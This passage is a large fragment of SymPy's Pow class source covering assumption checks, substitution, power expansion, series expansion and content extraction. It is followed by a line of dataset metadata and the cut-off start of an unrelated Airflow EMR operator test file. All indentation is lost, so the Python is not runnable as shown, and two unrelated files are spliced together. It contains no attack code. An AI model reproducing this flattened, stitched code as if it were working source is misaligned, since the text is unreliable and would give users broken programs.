im_b = self.base.is_imaginary
im_e = self.exp.is_imaginary
if im_b:
if self.exp.is_integer:
if self.exp.is_even:
return True
elif self.exp.is_odd:
return False
elif im_e and log(self.base).is_imaginary:
return True
elif self.exp.is_Add:
c, a = self.exp.as_coeff_Add()
if c and c.is_Integer:
return Mul(
self.base**c, self.base**a, evaluate=False).is_extended_real
elif self.base in (-S.ImaginaryUnit, S.ImaginaryUnit):
if (self.exp/2).is_integer is False:
return False
if real_b and im_e:
if self.base is S.NegativeOne:
return True
c = self.exp.coeff(S.ImaginaryUnit)
if c:
if self.base.is_rational and c.is_rational:
if self.base.is_nonzero and (self.base - 1).is_nonzero and c.is_nonzero:
return False
ok = (c*log(self.base)/S.Pi).is_integer
if ok is not None:
return ok
if real_b is False: # we already know it's not imag
i = arg(self.base)*self.exp/S.Pi
return i.is_integer
def _eval_is_complex(self):
if all(a.is_complex for a in self.args) and self._eval_is_finite():
return True
def _eval_is_imaginary(self):
from sympy import arg, log
if self.base.is_imaginary:
if self.exp.is_integer:
odd = self.exp.is_odd
if odd is not None:
return odd
return
if self.exp.is_imaginary:
imlog = log(self.base).is_imaginary
if imlog is not None:
return False # I**i -> real; (2*I)**i -> complex ==> not imaginary
if self.base.is_extended_real and self.exp.is_extended_real:
if self.base.is_positive:
return False
else:
rat = self.exp.is_rational
if not rat:
return rat
if self.exp.is_integer:
return False
else:
half = (2*self.exp).is_integer
if half:
return self.base.is_negative
return half
if self.base.is_extended_real is False: # we already know it's not imag
i = arg(self.base)*self.exp/S.Pi
isodd = (2*i).is_odd
if isodd is not None:
return isodd
if self.exp.is_negative:
return (1/self).is_imaginary
def _eval_is_odd(self):
if self.exp.is_integer:
if self.exp.is_positive:
return self.base.is_odd
elif self.exp.is_nonnegative and self.base.is_odd:
return True
elif self.base is S.NegativeOne:
return True
def _eval_is_finite(self):
if self.exp.is_negative:
if self.base.is_zero:
return False
if self.base.is_infinite or self.base.is_nonzero:
return True
c1 = self.base.is_finite
if c1 is None:
return
c2 = self.exp.is_finite
if c2 is None:
return
if c1 and c2:
if self.exp.is_nonnegative or fuzzy_not(self.base.is_zero):
return True
def _eval_is_prime(self):
'''
An integer raised to the n(>=2)-th power cannot be a prime.
'''
if self.base.is_integer and self.exp.is_integer and (self.exp - 1).is_positive:
return False
def _eval_is_composite(self):
"""
A power is composite if both base and exponent are greater than 1
"""
if (self.base.is_integer and self.exp.is_integer and
((self.base - 1).is_positive and (self.exp - 1).is_positive or
(self.base + 1).is_negative and self.exp.is_positive and self.exp.is_even)):
return True
def _eval_is_polar(self):
return self.base.is_polar
def _eval_subs(self, old, new):
from sympy import exp, log, Symbol
def _check(ct1, ct2, old):
"""Return (bool, pow, remainder_pow) where, if bool is True, then the
exponent of Pow `old` will combine with `pow` so the substitution
is valid, otherwise bool will be False.
For noncommutative objects, `pow` will be an integer, and a factor
`Pow(old.base, remainder_pow)` needs to be included. If there is
no such factor, None is returned. For commutative objects,
remainder_pow is always None.
cti are the coefficient and terms of an exponent of self or old
In this _eval_subs routine a change like (b**(2*x)).subs(b**x, y)
will give y**2 since (b**x)**2 == b**(2*x); if that equality does
not hold then the substitution should not occur so `bool` will be
False.
"""
coeff1, terms1 = ct1
coeff2, terms2 = ct2
if terms1 == terms2:
if old.is_commutative:
# Allow fractional powers for commutative objects
pow = coeff1/coeff2
try:
as_int(pow, strict=False)
combines = True
except ValueError:
combines = isinstance(Pow._eval_power(
Pow(*old.as_base_exp(), evaluate=False),
pow), (Pow, exp, Symbol))
return combines, pow, None
else:
# With noncommutative symbols, substitute only integer powers
if not isinstance(terms1, tuple):
terms1 = (terms1,)
if not all(term.is_integer for term in terms1):
return False, None, None
try:
# Round pow toward zero
pow, remainder = divmod(as_int(coeff1), as_int(coeff2))
if pow < 0 and remainder != 0:
pow += 1
remainder -= as_int(coeff2)
if remainder == 0:
remainder_pow = None
else:
remainder_pow = Mul(remainder, *terms1)
return True, pow, remainder_pow
except ValueError:
# Can't substitute
pass
return False, None, None
if old == self.base:
return new**self.exp._subs(old, new)
# issue 10829: (4**x - 3*y + 2).subs(2**x, y) -> y**2 - 3*y + 2
if isinstance(old, self.func) and self.exp == old.exp:
l = log(self.base, old.base)
if l.is_Number:
return Pow(new, l)
if isinstance(old, self.func) and self.base == old.base:
if self.exp.is_Add is False:
ct1 = self.exp.as_independent(Symbol, as_Add=False)
ct2 = old.exp.as_independent(Symbol, as_Add=False)
ok, pow, remainder_pow = _check(ct1, ct2, old)
if ok:
# issue 5180: (x**(6*y)).subs(x**(3*y),z)->z**2
result = self.func(new, pow)
if remainder_pow is not None:
result = Mul(result, Pow(old.base, remainder_pow))
return result
else: # b**(6*x + a).subs(b**(3*x), y) -> y**2 * b**a
# exp(exp(x) + exp(x**2)).subs(exp(exp(x)), w) -> w * exp(exp(x**2))
oarg = old.exp
new_l = []
o_al = []
ct2 = oarg.as_coeff_mul()
for a in self.exp.args:
newa = a._subs(old, new)
ct1 = newa.as_coeff_mul()
ok, pow, remainder_pow = _check(ct1, ct2, old)
if ok:
new_l.append(new**pow)
if remainder_pow is not None:
o_al.append(remainder_pow)
continue
elif not old.is_commutative and not newa.is_integer:
# If any term in the exponent is non-integer,
# we do not do any substitutions in the noncommutative case
return
o_al.append(newa)
if new_l:
expo = Add(*o_al)
new_l.append(Pow(self.base, expo, evaluate=False) if expo != 1 else self.base)
return Mul(*new_l)
if isinstance(old, exp) and self.exp.is_extended_real and self.base.is_positive:
ct1 = old.args[0].as_independent(Symbol, as_Add=False)
ct2 = (self.exp*log(self.base)).as_independent(
Symbol, as_Add=False)
ok, pow, remainder_pow = _check(ct1, ct2, old)
if ok:
result = self.func(new, pow) # (2**x).subs(exp(x*log(2)), z) -> z
if remainder_pow is not None:
result = Mul(result, Pow(old.base, remainder_pow))
return result
def as_base_exp(self):
"""Return base and exp of self.
If base is 1/Integer, then return Integer, -exp. If this extra
processing is not needed, the base and exp properties will
give the raw arguments
Examples
========
>>> from sympy import Pow, S
>>> p = Pow(S.Half, 2, evaluate=False)
>>> p.as_base_exp()
(2, -2)
>>> p.args
(1/2, 2)
"""
b, e = self.args
if b.is_Rational and b.p == 1 and b.q != 1:
return Integer(b.q), -e
return b, e
def _eval_adjoint(self):
from sympy.functions.elementary.complexes import adjoint
i, p = self.exp.is_integer, self.base.is_positive
if i:
return adjoint(self.base)**self.exp
if p:
return self.base**adjoint(self.exp)
if i is False and p is False:
expanded = expand_complex(self)
if expanded != self:
return adjoint(expanded)
def _eval_conjugate(self):
from sympy.functions.elementary.complexes import conjugate as c
i, p = self.exp.is_integer, self.base.is_positive
if i:
return c(self.base)**self.exp
if p:
return self.base**c(self.exp)
if i is False and p is False:
expanded = expand_complex(self)
if expanded != self:
return c(expanded)
if self.is_extended_real:
return self
def _eval_transpose(self):
from sympy.functions.elementary.complexes import transpose
i, p = self.exp.is_integer, (self.base.is_complex or self.base.is_infinite)
if p:
return self.base**self.exp
if i:
return transpose(self.base)**self.exp
if i is False and p is False:
expanded = expand_complex(self)
if expanded != self:
return transpose(expanded)
def _eval_expand_power_exp(self, **hints):
"""a**(n + m) -> a**n*a**m"""
b = self.base
e = self.exp
if e.is_Add and e.is_commutative:
expr = []
for x in e.args:
expr.append(self.func(self.base, x))
return Mul(*expr)
return self.func(b, e)
def _eval_expand_power_base(self, **hints):
"""(a*b)**n -> a**n * b**n"""
force = hints.get('force', False)
b = self.base
e = self.exp
if not b.is_Mul:
return self
cargs, nc = b.args_cnc(split_1=False)
# expand each term - this is top-level-only
# expansion but we have to watch out for things
# that don't have an _eval_expand method
if nc:
nc = [i._eval_expand_power_base(**hints)
if hasattr(i, '_eval_expand_power_base') else i
for i in nc]
if e.is_Integer:
if e.is_positive:
rv = Mul(*nc*e)
else:
rv = Mul(*[i**-1 for i in nc[::-1]]*-e)
if cargs:
rv *= Mul(*cargs)**e
return rv
if not cargs:
return self.func(Mul(*nc), e, evaluate=False)
nc = [Mul(*nc)]
# sift the commutative bases
other, maybe_real = sift(cargs, lambda x: x.is_extended_real is False,
binary=True)
def pred(x):
if x is S.ImaginaryUnit:
return S.ImaginaryUnit
polar = x.is_polar
if polar:
return True
if polar is None:
return fuzzy_bool(x.is_extended_nonnegative)
sifted = sift(maybe_real, pred)
nonneg = sifted[True]
other += sifted[None]
neg = sifted[False]
imag = sifted[S.ImaginaryUnit]
if imag:
I = S.ImaginaryUnit
i = len(imag) % 4
if i == 0:
pass
elif i == 1:
other.append(I)
elif i == 2:
if neg:
nonn = -neg.pop()
if nonn is not S.One:
nonneg.append(nonn)
else:
neg.append(S.NegativeOne)
else:
if neg:
nonn = -neg.pop()
if nonn is not S.One:
nonneg.append(nonn)
else:
neg.append(S.NegativeOne)
other.append(I)
del imag
# bring out the bases that can be separated from the base
if force or e.is_integer:
# treat all commutatives the same and put nc in other
cargs = nonneg + neg + other
other = nc
else:
# this is just like what is happening automatically, except
# that now we are doing it for an arbitrary exponent for which
# no automatic expansion is done
assert not e.is_Integer
# handle negatives by making them all positive and putting
# the residual -1 in other
if len(neg) > 1:
o = S.One
if not other and neg[0].is_Number:
o *= neg.pop(0)
if len(neg) % 2:
o = -o
for n in neg:
nonneg.append(-n)
if o is not S.One:
other.append(o)
elif neg and other:
if neg[0].is_Number and neg[0] is not S.NegativeOne:
other.append(S.NegativeOne)
nonneg.append(-neg[0])
else:
other.extend(neg)
else:
other.extend(neg)
del neg
cargs = nonneg
other += nc
rv = S.One
if cargs:
rv *= Mul(*[self.func(b, e, evaluate=False) for b in cargs])
if other:
rv *= self.func(Mul(*other), e, evaluate=False)
return rv
def _eval_expand_multinomial(self, **hints):
"""(a + b + ..)**n -> a**n + n*a**(n-1)*b + .., n is nonzero integer"""
base, exp = self.args
result = self
if exp.is_Rational and exp.p > 0 and base.is_Add:
if not exp.is_Integer:
n = Integer(exp.p // exp.q)
if not n:
return result
else:
radical, result = self.func(base, exp - n), []
expanded_base_n = self.func(base, n)
if expanded_base_n.is_Pow:
expanded_base_n = \
expanded_base_n._eval_expand_multinomial()
for term in Add.make_args(expanded_base_n):
result.append(term*radical)
return Add(*result)
n = int(exp)
if base.is_commutative:
order_terms, other_terms = [], []
for b in base.args:
if b.is_Order:
order_terms.append(b)
else:
other_terms.append(b)
if order_terms:
# (f(x) + O(x^n))^m -> f(x)^m + m*f(x)^{m-1} *O(x^n)
f = Add(*other_terms)
o = Add(*order_terms)
if n == 2:
return expand_multinomial(f**n, deep=False) + n*f*o
else:
g = expand_multinomial(f**(n - 1), deep=False)
return expand_mul(f*g, deep=False) + n*g*o
if base.is_number:
# Efficiently expand expressions of the form (a + b*I)**n
# where 'a' and 'b' are real numbers and 'n' is integer.
a, b = base.as_real_imag()
if a.is_Rational and b.is_Rational:
if not a.is_Integer:
if not b.is_Integer:
k = self.func(a.q * b.q, n)
a, b = a.p*b.q, a.q*b.p
else:
k = self.func(a.q, n)
a, b = a.p, a.q*b
elif not b.is_Integer:
k = self.func(b.q, n)
a, b = a*b.q, b.p
else:
k = 1
a, b, c, d = int(a), int(b), 1, 0
while n:
if n & 1:
c, d = a*c - b*d, b*c + a*d
n -= 1
a, b = a*a - b*b, 2*a*b
n //= 2
I = S.ImaginaryUnit
if k == 1:
return c + I*d
else:
return Integer(c)/k + I*d/k
p = other_terms
# (x + y)**3 -> x**3 + 3*x**2*y + 3*x*y**2 + y**3
# in this particular example:
# p = [x,y]; n = 3
# so now it's easy to get the correct result -- we get the
# coefficients first:
from sympy import multinomial_coefficients
from sympy.polys.polyutils import basic_from_dict
expansion_dict = multinomial_coefficients(len(p), n)
# in our example: {(3, 0): 1, (1, 2): 3, (0, 3): 1, (2, 1): 3}
# and now construct the expression.
return basic_from_dict(expansion_dict, *p)
else:
if n == 2:
return Add(*[f*g for f in base.args for g in base.args])
else:
multi = (base**(n - 1))._eval_expand_multinomial()
if multi.is_Add:
return Add(*[f*g for f in base.args
for g in multi.args])
else:
# XXX can this ever happen if base was an Add?
return Add(*[f*multi for f in base.args])
elif (exp.is_Rational and exp.p < 0 and base.is_Add and
abs(exp.p) > exp.q):
return 1 / self.func(base, -exp)._eval_expand_multinomial()
elif exp.is_Add and base.is_Number:
# n**(a + b) -> n**a * n**b, where n, a, b are Numbers
coeff, tail = S.One, S.Zero
for term in exp.args:
if term.is_Number:
coeff *= self.func(base, term)
else:
tail += term
return coeff * self.func(base, tail)
else:
return result
def as_real_imag(self, deep=True, **hints):
from sympy import atan2, cos, im, re, sin
from sympy.polys.polytools import poly
if self.exp.is_Integer:
exp = self.exp
re_e, im_e = self.base.as_real_imag(deep=deep)
if not im_e:
return self, S.Zero
a, b = symbols('a b', cls=Dummy)
if exp >= 0:
if re_e.is_Number and im_e.is_Number:
# We can be more efficient in this case
expr = expand_multinomial(self.base**exp)
if expr != self:
return expr.as_real_imag()
expr = poly(
(a + b)**exp) # a = re, b = im; expr = (a + b*I)**exp
else:
mag = re_e**2 + im_e**2
re_e, im_e = re_e/mag, -im_e/mag
if re_e.is_Number and im_e.is_Number:
# We can be more efficient in this case
expr = expand_multinomial((re_e + im_e*S.ImaginaryUnit)**-exp)
if expr != self:
return expr.as_real_imag()
expr = poly((a + b)**-exp)
# Terms with even b powers will be real
r = [i for i in expr.terms() if not i[0][1] % 2]
re_part = Add(*[cc*a**aa*b**bb for (aa, bb), cc in r])
# Terms with odd b powers will be imaginary
r = [i for i in expr.terms() if i[0][1] % 4 == 1]
im_part1 = Add(*[cc*a**aa*b**bb for (aa, bb), cc in r])
r = [i for i in expr.terms() if i[0][1] % 4 == 3]
im_part3 = Add(*[cc*a**aa*b**bb for (aa, bb), cc in r])
return (re_part.subs({a: re_e, b: S.ImaginaryUnit*im_e}),
im_part1.subs({a: re_e, b: im_e}) + im_part3.subs({a: re_e, b: -im_e}))
elif self.exp.is_Rational:
re_e, im_e = self.base.as_real_imag(deep=deep)
if im_e.is_zero and self.exp is S.Half:
if re_e.is_extended_nonnegative:
return self, S.Zero
if re_e.is_extended_nonpositive:
return S.Zero, (-self.base)**self.exp
# XXX: This is not totally correct since for x**(p/q) with
# x being imaginary there are actually q roots, but
# only a single one is returned from here.
r = self.func(self.func(re_e, 2) + self.func(im_e, 2), S.Half)
t = atan2(im_e, re_e)
rp, tp = self.func(r, self.exp), t*self.exp
return (rp*cos(tp), rp*sin(tp))
else:
if deep:
hints['complex'] = False
expanded = self.expand(deep, **hints)
if hints.get('ignore') == expanded:
return None
else:
return (re(expanded), im(expanded))
else:
return (re(self), im(self))
def _eval_derivative(self, s):
from sympy import log
dbase = self.base.diff(s)
dexp = self.exp.diff(s)
return self * (dexp * log(self.base) + dbase * self.exp/self.base)
def _eval_evalf(self, prec):
base, exp = self.as_base_exp()
base = base._evalf(prec)
if not exp.is_Integer:
exp = exp._evalf(prec)
if exp.is_negative and base.is_number and base.is_extended_real is False:
base = base.conjugate() / (base * base.conjugate())._evalf(prec)
exp = -exp
return self.func(base, exp).expand()
return self.func(base, exp)
def _eval_is_polynomial(self, syms):
if self.exp.has(*syms):
return False
if self.base.has(*syms):
return bool(self.base._eval_is_polynomial(syms) and
self.exp.is_Integer and (self.exp >= 0))
else:
return True
def _eval_is_rational(self):
# The evaluation of self.func below can be very expensive in the case
# of integer**integer if the exponent is large. We should try to exit
# before that if possible:
if (self.exp.is_integer and self.base.is_rational
and fuzzy_not(fuzzy_and([self.exp.is_negative, self.base.is_zero]))):
return True
p = self.func(*self.as_base_exp()) # in case it's unevaluated
if not p.is_Pow:
return p.is_rational
b, e = p.as_base_exp()
if e.is_Rational and b.is_Rational:
# we didn't check that e is not an Integer
# because Rational**Integer autosimplifies
return False
if e.is_integer:
if b.is_rational:
if fuzzy_not(b.is_zero) or e.is_nonnegative:
return True
if b == e: # always rational, even for 0**0
return True
elif b.is_irrational:
return e.is_zero
def _eval_is_algebraic(self):
def _is_one(expr):
try:
return (expr - 1).is_zero
except ValueError:
# when the operation is not allowed
return False
if self.base.is_zero or _is_one(self.base):
return True
elif self.exp.is_rational:
if self.base.is_algebraic is False:
return self.exp.is_zero
if self.base.is_zero is False:
if self.exp.is_nonzero:
return self.base.is_algebraic
elif self.base.is_algebraic:
return True
if self.exp.is_positive:
return self.base.is_algebraic
elif self.base.is_algebraic and self.exp.is_algebraic:
if ((fuzzy_not(self.base.is_zero)
and fuzzy_not(_is_one(self.base)))
or self.base.is_integer is False
or self.base.is_irrational):
return self.exp.is_rational
def _eval_is_rational_function(self, syms):
if self.exp.has(*syms):
return False
if self.base.has(*syms):
return self.base._eval_is_rational_function(syms) and \
self.exp.is_Integer
else:
return True
def _eval_is_algebraic_expr(self, syms):
if self.exp.has(*syms):
return False
if self.base.has(*syms):
return self.base._eval_is_algebraic_expr(syms) and \
self.exp.is_Rational
else:
return True
def _eval_rewrite_as_exp(self, base, expo, **kwargs):
from sympy import exp, log, I, arg
if base.is_zero or base.has(exp) or expo.has(exp):
return base**expo
if base.has(Symbol):
# delay evaluation if expo is non symbolic
# (as exp(x*log(5)) automatically reduces to x**5)
return exp(log(base)*expo, evaluate=expo.has(Symbol))
else:
return exp((log(abs(base)) + I*arg(base))*expo)
def as_numer_denom(self):
if not self.is_commutative:
return self, S.One
base, exp = self.as_base_exp()
n, d = base.as_numer_denom()
# this should be the same as ExpBase.as_numer_denom wrt
# exponent handling
neg_exp = exp.is_negative
if not neg_exp and not (-exp).is_negative:
neg_exp = _coeff_isneg(exp)
int_exp = exp.is_integer
# the denominator cannot be separated from the numerator if
# its sign is unknown unless the exponent is an integer, e.g.
# sqrt(a/b) != sqrt(a)/sqrt(b) when a=1 and b=-1. But if the
# denominator is negative the numerator and denominator can
# be negated and the denominator (now positive) separated.
if not (d.is_extended_real or int_exp):
n = base
d = S.One
dnonpos = d.is_nonpositive
if dnonpos:
n, d = -n, -d
elif dnonpos is None and not int_exp:
n = base
d = S.One
if neg_exp:
n, d = d, n
exp = -exp
if exp.is_infinite:
if n is S.One and d is not S.One:
return n, self.func(d, exp)
if n is not S.One and d is S.One:
return self.func(n, exp), d
return self.func(n, exp), self.func(d, exp)
def matches(self, expr, repl_dict={}, old=False):
expr = _sympify(expr)
# special case, pattern = 1 and expr.exp can match to 0
if expr is S.One:
d = repl_dict.copy()
d = self.exp.matches(S.Zero, d)
if d is not None:
return d
# make sure the expression to be matched is an Expr
if not isinstance(expr, Expr):
return None
b, e = expr.as_base_exp()
# special case number
sb, se = self.as_base_exp()
if sb.is_Symbol and se.is_Integer and expr:
if e.is_rational:
return sb.matches(b**(e/se), repl_dict)
return sb.matches(expr**(1/se), repl_dict)
d = repl_dict.copy()
d = self.base.matches(b, d)
if d is None:
return None
d = self.exp.xreplace(d).matches(e, d)
if d is None:
return Expr.matches(self, expr, repl_dict)
return d
def _eval_nseries(self, x, n, logx):
# NOTE! This function is an important part of the gruntz algorithm
# for computing limits. It has to return a generalized power
# series with coefficients in C(log, log(x)). In more detail:
# It has to return an expression
# c_0*x**e_0 + c_1*x**e_1 + ... (finitely many terms)
# where e_i are numbers (not necessarily integers) and c_i are
# expressions involving only numbers, the log function, and log(x).
from sympy import ceiling, collect, exp, log, O, Order, powsimp
b, e = self.args
if e.is_Integer:
if e > 0:
# positive integer powers are easy to expand, e.g.:
# sin(x)**4 = (x - x**3/3 + ...)**4 = ...
return expand_multinomial(self.func(b._eval_nseries(x, n=n,
logx=logx), e), deep=False)
elif e is S.NegativeOne:
# this is also easy to expand using the formula:
# 1/(1 + x) = 1 - x + x**2 - x**3 ...
# so we need to rewrite base to the form "1 + x"
nuse = n
cf = 1
try:
ord = b.as_leading_term(x)
cf = Order(ord, x).getn()
if cf and cf.is_Number:
nuse = n + 2*ceiling(cf)
else:
cf = 1
except NotImplementedError:
pass
b_orig, prefactor = b, O(1, x)
while prefactor.is_Order:
nuse += 1
b = b_orig._eval_nseries(x, n=nuse, logx=logx)
prefactor = b.as_leading_term(x)
# express "rest" as: rest = 1 + k*x**l + ... + O(x**n)
rest = expand_mul((b - prefactor)/prefactor)
if rest.is_Order:
return 1/prefactor + rest/prefactor + O(x**n, x)
k, l = rest.leadterm(x)
if l.is_Rational and l > 0:
pass
elif l.is_number and l > 0:
l = l.evalf()
elif l == 0:
k = k.simplify()
if k == 0:
# if prefactor == w**4 + x**2*w**4 + 2*x*w**4, we need to
# factor the w**4 out using collect:
return 1/collect(prefactor, x)
else:
raise NotImplementedError()
else:
raise NotImplementedError()
if cf < 0:
cf = S.One/abs(cf)
try:
dn = Order(1/prefactor, x).getn()
if dn and dn < 0:
pass
else:
dn = 0
except NotImplementedError:
dn = 0
terms = [1/prefactor]
for m in range(1, ceiling((n - dn + 1)/l*cf)):
new_term = terms[-1]*(-rest)
if new_term.is_Pow:
new_term = new_term._eval_expand_multinomial(
deep=False)
else:
new_term = expand_mul(new_term, deep=False)
terms.append(new_term)
terms.append(O(x**n, x))
return powsimp(Add(*terms), deep=True, combine='exp')
else:
# negative powers are rewritten to the cases above, for
# example:
# sin(x)**(-4) = 1/(sin(x)**4) = ...
# and expand the denominator:
nuse, denominator = n, O(1, x)
while denominator.is_Order:
denominator = (b**(-e))._eval_nseries(x, n=nuse, logx=logx)
nuse += 1
if 1/denominator == self:
return self
# now we have a type 1/f(x), that we know how to expand
return (1/denominator)._eval_nseries(x, n=n, logx=logx)
if e.has(Symbol):
return exp(e*log(b))._eval_nseries(x, n=n, logx=logx)
# see if the base is as simple as possible
bx = b
while bx.is_Pow and bx.exp.is_Rational:
bx = bx.base
if bx == x:
return self
# work for b(x)**e where e is not an Integer and does not contain x
# and hopefully has no other symbols
def e2int(e):
"""return the integer value (if possible) of e and a
flag indicating whether it is bounded or not."""
n = e.limit(x, 0)
infinite = n.is_infinite
if not infinite:
# XXX was int or floor intended? int used to behave like floor
# so int(-Rational(1, 2)) returned -1 rather than int's 0
try:
n = int(n)
except TypeError:
# well, the n is something more complicated (like 1 + log(2))
try:
n = int(n.evalf()) + 1 # XXX why is 1 being added?
except TypeError:
pass # hope that base allows this to be resolved
n = _sympify(n)
return n, infinite
order = O(x**n, x)
ei, infinite = e2int(e)
b0 = b.limit(x, 0)
if infinite and (b0 is S.One or b0.has(Symbol)):
# XXX what order
if b0 is S.One:
resid = (b - 1)
if resid.is_positive:
return S.Infinity
elif resid.is_negative:
return S.Zero
raise ValueError('cannot determine sign of %s' % resid)
return b0**ei
if (b0 is S.Zero or b0.is_infinite):
if infinite is not False:
return b0**e # XXX what order
if not ei.is_number: # if not, how will we proceed?
raise ValueError(
'expecting numerical exponent but got %s' % ei)
nuse = n - ei
if e.is_extended_real and e.is_positive:
lt = b.as_leading_term(x)
# Try to correct nuse (= m) guess from:
# (lt + rest + O(x**m))**e =
# lt**e*(1 + rest/lt + O(x**m)/lt)**e =
# lt**e + ... + O(x**m)*lt**(e - 1) = ... + O(x**n)
try:
cf = Order(lt, x).getn()
nuse = ceiling(n - cf*(e - 1))
except NotImplementedError:
pass
bs = b._eval_nseries(x, n=nuse, logx=logx)
terms = bs.removeO()
if terms.is_Add:
bs = terms
lt = terms.as_leading_term(x)
# bs -> lt + rest -> lt*(1 + (bs/lt - 1))
return ((self.func(lt, e) * self.func((bs/lt).expand(), e).nseries(
x, n=nuse, logx=logx)).expand() + order)
if bs.is_Add:
from sympy import O
# So, bs + O() == terms
c = Dummy('c')
res = []
for arg in bs.args:
if arg.is_Order:
arg = c*arg.expr
res.append(arg)
bs = Add(*res)
rv = (bs**e).series(x).subs(c, O(1, x))
rv += order
return rv
rv = bs**e
if terms != bs:
rv += order
return rv
# either b0 is bounded but neither 1 nor 0 or e is infinite
# b -> b0 + (b - b0) -> b0 * (1 + (b/b0 - 1))
o2 = order*(b0**-e)
z = (b/b0 - 1)
o = O(z, x)
if o is S.Zero or o2 is S.Zero:
infinite = True
else:
if o.expr.is_number:
e2 = log(o2.expr*x)/log(x)
else:
e2 = log(o2.expr)/log(o.expr)
n, infinite = e2int(e2)
if infinite:
# requested accuracy gives infinite series,
# order is probably non-polynomial e.g. O(exp(-1/x), x).
r = 1 + z
else:
l = []
g = None
for i in range(n + 2):
g = self._taylor_term(i, z, g)
g = g.nseries(x, n=n, logx=logx)
l.append(g)
r = Add(*l)
return expand_mul(r*b0**e) + order
def _eval_as_leading_term(self, x):
from sympy import exp, log
if not self.exp.has(x):
return self.func(self.base.as_leading_term(x), self.exp)
return exp(self.exp * log(self.base)).as_leading_term(x)
@cacheit
def _taylor_term(self, n, x, *previous_terms): # of (1 + x)**e
from sympy import binomial
return binomial(self.exp, n) * self.func(x, n)
def _sage_(self):
return self.args[0]._sage_()**self.args[1]._sage_()
def as_content_primitive(self, radical=False, clear=True):
"""Return the tuple (R, self/R) where R is the positive Rational
extracted from self.
Examples
========
>>> from sympy import sqrt
>>> sqrt(4 + 4*sqrt(2)).as_content_primitive()
(2, sqrt(1 + sqrt(2)))
>>> sqrt(3 + 3*sqrt(2)).as_content_primitive()
(1, sqrt(3)*sqrt(1 + sqrt(2)))
>>> from sympy import expand_power_base, powsimp, Mul
>>> from sympy.abc import x, y
>>> ((2*x + 2)**2).as_content_primitive()
(4, (x + 1)**2)
>>> (4**((1 + y)/2)).as_content_primitive()
(2, 4**(y/2))
>>> (3**((1 + y)/2)).as_content_primitive()
(1, 3**((y + 1)/2))
>>> (3**((5 + y)/2)).as_content_primitive()
(9, 3**((y + 1)/2))
>>> eq = 3**(2 + 2*x)
>>> powsimp(eq) == eq
True
>>> eq.as_content_primitive()
(9, 3**(2*x))
>>> powsimp(Mul(*_))
3**(2*x + 2)
>>> eq = (2 + 2*x)**y
>>> s = expand_power_base(eq); s.is_Mul, s
(False, (2*x + 2)**y)
>>> eq.as_content_primitive()
(1, (2*(x + 1))**y)
>>> s = expand_power_base(_[1]); s.is_Mul, s
(True, 2**y*(x + 1)**y)
See docstring of Expr.as_content_primitive for more examples.
"""
b, e = self.as_base_exp()
b = _keep_coeff(*b.as_content_primitive(radical=radical, clear=clear))
ce, pe = e.as_content_primitive(radical=radical, clear=clear)
if b.is_Rational:
#e
#= ce*pe
#= ce*(h + t)
#= ce*h + ce*t
#=> self
#= b**(ce*h)*b**(ce*t)
#= b**(cehp/cehq)*b**(ce*t)
#= b**(iceh + r/cehq)*b**(ce*t)
#= b**(iceh)*b**(r/cehq)*b**(ce*t)
#= b**(iceh)*b**(ce*t + r/cehq)
h, t = pe.as_coeff_Add()
if h.is_Rational:
ceh = ce*h
c = self.func(b, ceh)
r = S.Zero
if not c.is_Rational:
iceh, r = divmod(ceh.p, ceh.q)
c = self.func(b, iceh)
return c, self.func(b, _keep_coeff(ce, t + r/ce/ceh.q))
e = _keep_coeff(ce, pe)
# b**e = (h*t)**e = h**e*t**e = c*m*t**e
if e.is_Rational and b.is_Mul:
h, t = b.as_content_primitive(radical=radical, clear=clear) # h is positive
c, m = self.func(h, e).as_coeff_Mul() # so c is positive
m, me = m.as_base_exp()
if m is S.One or me == e: # probably always true
# return the following, not return c, m*Pow(t, e)
# which would change Pow into Mul; we let sympy
# decide what to do by using the unevaluated Mul, e.g
# should it stay as sqrt(2 + 2*sqrt(5)) or become
# sqrt(2)*sqrt(1 + sqrt(5))
return c, self.func(_keep_coeff(m, t), e)
return S.One, self.func(b, e)
def is_constant(self, *wrt, **flags):
expr = self
if flags.get('simplify', True):
expr = expr.simplify()
b, e = expr.as_base_exp()
bz = b.equals(0)
if bz: # recalculate with assumptions in case it's unevaluated
new = b**e
if new != expr:
return new.is_constant()
econ = e.is_constant(*wrt)
bcon = b.is_constant(*wrt)
if bcon:
if econ:
return True
bz = b.equals(0)
if bz is False:
return False
elif bcon is None:
return None
return e.equals(0)
def _eval_difference_delta(self, n, step):
b, e = self.args
if e.has(n) and not b.has(n):
new_e = e.subs(n, n + step)
return (b**(new_e - e) - 1) * self
from .add import Add
from .numbers import Integer
from .mul import Mul, _keep_coeff
from .symbol import Symbol, Dummy, symbols
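# A few of the singleton rules tabulated in the Pow docstring, as they look in an
# interactive session (illustrative; uses only the public sympy API):
#     >>> from sympy import S, oo
#     >>> S.Zero**-1, S.Zero**oo, S.One**oo, S.NegativeOne**oo
#     (zoo, 0, nan, nan)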
| 37.397953
| 98
| 0.467872
|
e5ac9fe129b72c2c8d5c60b00b11734b8a533d67
| 3,277
|
py
|
Python
|
tests/contrib/operators/test_emr_add_steps_operator.py
|
RyanMagnusson/incubator-airflow
|
ad81412fba2e8510442db73d9c905cac5eed8ebd
|
[
"Apache-2.0"
] | 2
|
2018-03-07T12:25:05.000Z
|
2018-03-19T01:00:10.000Z
|
tests/contrib/operators/test_emr_add_steps_operator.py
|
RyanMagnusson/incubator-airflow
|
ad81412fba2e8510442db73d9c905cac5eed8ebd
|
[
"Apache-2.0"
] | null | null | null |
tests/contrib/operators/test_emr_add_steps_operator.py
|
RyanMagnusson/incubator-airflow
|
ad81412fba2e8510442db73d9c905cac5eed8ebd
|
[
"Apache-2.0"
] | 1
|
2020-07-14T09:45:54.000Z
|
2020-07-14T09:45:54.000Z
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from datetime import timedelta
from mock import MagicMock, patch
from airflow import DAG, configuration
from airflow.contrib.operators.emr_add_steps_operator import EmrAddStepsOperator
from airflow.models import TaskInstance
from airflow.utils import timezone
DEFAULT_DATE = timezone.datetime(2017, 1, 1)
ADD_STEPS_SUCCESS_RETURN = {
'ResponseMetadata': {
'HTTPStatusCode': 200
},
